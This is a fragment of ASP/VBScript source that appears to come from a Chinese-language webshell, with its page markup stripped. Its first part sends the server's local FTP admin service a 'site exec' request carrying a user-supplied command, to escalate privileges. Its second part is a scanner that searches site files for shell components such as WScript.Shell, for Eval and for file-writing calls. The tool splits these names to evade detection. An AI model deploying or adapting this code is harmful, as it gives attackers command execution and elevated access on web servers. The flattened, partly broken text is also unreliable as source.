loginpass & mt & deldomain & newdomain & newuser & quit set session("a")=a RRS"" RRS"" case 2 set b=Server.CreateObject("Microsoft.XMLHTTP") b.open "GET", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2", True, "", "" b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit set session("b")=b RRS"" RRS"" case 3 set c=Server.CreateObject("Microsoft.XMLHTTP") a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True, "", "" a.send loginuser & loginpass & mt & deldomain & quit set session("a")=a RRS"提权完毕,已执行了命令：
"&cmd&"

" RRS"" RRS"" case else on error resume next set a=session("a") set b=session("b") set c=session("c") a.abort Set a = Nothing b.abort Set b = Nothing c.abort Set c = Nothing RRS"" end select function Gpath() on error resume next err.clear set f=Server.CreateObject("Scripting.FileSystemObject") if err.number>0 then gpath="c:" exit function end if gpath=f.GetSpecialFolder(0) gpath=lcase(left(gpath,2)) set f=nothing end function Case "kmuma" dim Report if request.QueryString("act")<>"scan" then RRS ("网站根目录- "&Server.MapPath("/")&"
") RRS ("本程序目录- "&Server.MapPath(".")) RRS "" else if request.Form("path")="" then RRS("路径不能为空") response.End() end if if request.Form("path")="\" then TmpPath = Server.MapPath("\") elseif request.Form("path")="." then TmpPath = Server.MapPath(".") else TmpPath = request.Form("path") end if timer1 = timer Sun = 0 SumFiles = 0 SumFolders = 1 If request.Form("radiobutton") = "sws" Then DimFileExt = "asp,cer,asa,cdx" Call ShowAllFile(TmpPath) Else If request.Form("path") = "" or request.Form("Search_Date") = "" or request.Form("Search_FileExt") = "" Then RRS("缉捕条件不完全

请返回重新输入") response.End() End If DimFileExt = request.Form("Search_fileExt") Call ShowAllFile2(TmpPath) End If RRS "" RRS "" RRS "" Sun = Sun + 1 temp="-同上-" End if If instr( filetxt, Lcase("She"&DoMyBest&"ll.Application") ) or Instr( filetxt, Lcase("clsid:13709620-C27"&DoMyBest&"9-11CE-A49E-444553540000") ) then Report = Report&"" Sun = Sun + 1 temp="-同上-" End If Set regEx = New RegExp regEx.IgnoreCase = True regEx.Global = True regEx.Pattern = "\bLANGUAGE\s*=\s*[""]?\s*(vbscript|jscript|javascript).encode\b" If regEx.Test(filetxt) Then Report = Report&"" Sun = Sun + 1 temp="-同上-" End If regEx.Pattern = "\bEv"&"al\b" If regEx.Test(filetxt) Then Report = Report&"" Sun = Sun + 1 temp="-同上-" End If regEx.Pattern = "[^.]\bExe"&"cute\b" If regEx.Test(filetxt) Then Report = Report&"" Sun = Sun + 1 temp="-同上-" End If regEx.Pattern = "\.(Open|Create)TextFile\b" If regEx.Test(filetxt) Then Report = Report&"" Sun = Sun + 1 temp="-同上-" End If regEx.Pattern = "\.SaveToFile\b" If regEx.Test(filetxt) Then Report = Report&"" Sun = Sun + 1 temp="-同上-" End If regEx.Pattern = "\.Save\b" If regEx.Test(filetxt) Then Report = Report&"" Sun = Sun + 1 temp="-同上-" End If Set regEx = Nothing Set regEx = New RegExp regEx.IgnoreCase = True regEx.Global = True regEx.Pattern = "

Scan WebShell

" RRS "

" RRS "扫描完毕！一共检查文件夹"&SumFolders&"个，文件"&SumFiles&"个，发现可疑点"&Sun&"个" RRS "" If request.Form("radiobutton") = "sws" Then RRS "" RRS "" RRS "" RRS "" else RRS "" RRS "" RRS "" end if RRS "" RRS Report RRS "

文件相对路径

特征码

描述

创建/修改时间

文件相对路径

文件创建时间

修改时间

" timer2 = timer thetime=cstr(int(((timer2-timer1)*10000 )+0.5)/10) RRS "
本页执行共用了"&thetime&"毫秒" end if Sub ShowAllFile(Path) Set F1SO = CreateObject("Scripting.FileSystemObject") if not F1SO.FolderExists(path) then exit sub Set f = F1SO.GetFolder(Path) Set fc2 = f.files For Each myfile in fc2 If CheckExt(F1SO.GetExtensionName(path&"\"&myfile.name)) Then Call ScanFile(Path&Temp&"\"&myfile.name, "") SumFiles = SumFiles + 1 End If Next Set fc = f.SubFolders For Each f1 in fc ShowAllFile path&"\"&f1.name SumFolders = SumFolders + 1 Next Set F1SO = Nothing End Sub Sub ScanFile(FilePath, InFile) Server.ScriptTimeout=999999999 If InFile <> "" Then Infiles = "该文件被"& InFile & "文件包含执行" End If Set FSO1s = CreateObject("Scripting.FileSystemObject") on error resume next set ofile = FSO1s.OpenTextFile(FilePath) filetxt = Lcase(ofile.readall()) If err Then Exit Sub end if if len(filetxt)>0 then filetxt = vbcrlf & filetxt temp = ""&replace(FilePath,server.MapPath("\")&"\","",1,1,1)&"
" temp=temp&"Edit " temp=temp&"Del " temp=temp&"Copy " temp=temp&"Move" If instr( filetxt, Lcase("WScr"&DoMyBest&"ipt.Shell") ) or Instr( filetxt, Lcase("clsid:72C24DD5-D70A"&DoMyBest&"-438B-8A42-98424B88AFB8") ) then Report = Report&"

"&temp&"

WScr"&DoMyBest&"ipt.Shell 或者 clsid:72C24DD5-D70A"&DoMyBest&"-438B-8A42-98424B88AFB8

危险组件，一般被ASP木马利用"&infiles&"